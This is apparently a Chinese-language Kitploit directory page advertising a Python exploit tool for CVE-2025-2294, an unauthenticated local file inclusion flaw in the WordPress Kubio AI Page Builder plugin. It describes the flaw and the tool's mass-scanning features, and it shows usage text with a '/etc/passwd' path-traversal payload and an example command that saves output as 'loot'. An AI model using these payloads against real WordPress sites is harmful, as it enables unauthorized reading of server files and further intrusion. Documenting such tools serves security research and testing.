Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-2294 — Python利用脚本,针对CVE-2025-2294,一个影响WordPress Kubio AI Page Builder ≤ 2.5.1的未授权本地文件包含漏洞。支持单目标/多目标扫描、自定义payload、代理和响应预览。 | Kitploit
工具/GitHubGitHub/r0otk3r/cve-2025-2294
漏洞分析代码分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubr0otk3r/cve-2025-2294

CVE-2025-2294

Python利用脚本,针对CVE-2025-2294,一个影响WordPress Kubio AI Page Builder ≤ 2.5.1的未授权本地文件包含漏洞。支持单目标/多目标扫描、自定义payload、代理和响应预览。

查看仓库
31年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-2294 - WordPress Kubio AI 页面构建器 <= 2.5.1 - 本地文件包含 (LFI) 漏洞利用


概述

CVE-2025-2294 影响 WordPress 的 Kubio AI 页面构建器 插件(版本 2.5.1 及以下)。该插件通过 thekubio_hybrid_theme_load_template 函数存在一个未经认证的本地文件包含 (LFI) 漏洞。

此漏洞允许攻击者在易受攻击的 WordPress 服务器上包含并执行任意文件,可能导致:

  • 绕过访问控制
  • 读取敏感服务器文件
  • 远程代码执行(如果攻击者能够上传伪装成安全文件类型的恶意 PHP 文件)

漏洞详情

  • 漏洞类型: 本地文件包含 (LFI)
  • 受影响插件: Kubio AI 页面构建器
  • 受影响版本: ≤ 2.5.1
  • 攻击向量: 未经认证的 HTTP 请求,带有精心构造的参数
  • 可利用性: 高
  • CVSS 评分: 9.8 (严重) [CNA: Wordfence]

漏洞利用脚本说明

此 Python 脚本向易受攻击的 WordPress 站点发送精心构造的 HTTP GET 请求,以验证其是否存在 LFI 问题。

功能特性:

  • 测试单个 URL 或文件中的多个目标。
  • 可自定义任意文件包含的有效载荷(默认:/etc/passwd)。
  • 将完整响应保存到文件。
  • 预览响应的前 N 行,以便快速验证。
  • 支持 HTTP 代理。
  • 仅检查模式,用于漏洞扫描而不保存输出。

用法

root@kitploit:~
usage: cve_2025_2294.py [-h] [--url URL] [--payload PAYLOAD] [--save SAVE]
                        [--lines LINES] [--timeout TIMEOUT] [--proxy PROXY]
                        [--check] [--list LIST]

CVE-2025-2294 LFI Exploit

optional arguments:
  -h, --help       show this help message and exit
  --url URL        Target URL (e.g., http://127.0.0.1:8080)
  --payload PAYLOAD
                   LFI payload path (default: ../../../../../../../../etc/passwd)
  --save SAVE      Save full response to file (optional)
  --lines LINES    Number of preview lines (default: 10)
  --timeout TIMEOUT
                   Request timeout in seconds (default: 10)
  --proxy PROXY    Proxy URL (e.g., http://127.0.0.1:8080)
  --check          Check vulnerability status only, no saving or preview
  --list LIST      Path to file with list of URLs to check one by one

自定义有效载荷、代理和更长预览的高级示例:

root@kitploit:~
python3 cve_2025_2294.py --url "http://192.168.1.10" --save loot.txt --lines 20 --payload /etc/passwd --timeout 10 --proxy "http://127.0.0.1:8080"
Screenshot_2025-07-27_16_32_55

请求/响应:

Screenshot_2025-07-28_02_22_52

⚠️ 免责声明

本工具仅供授权的安全测试和研究使用。未经许可对系统进行未授权使用是违法且不道德的。


官方渠道

  • YouTube @rootctf
  • X @r0otk3r
下载工具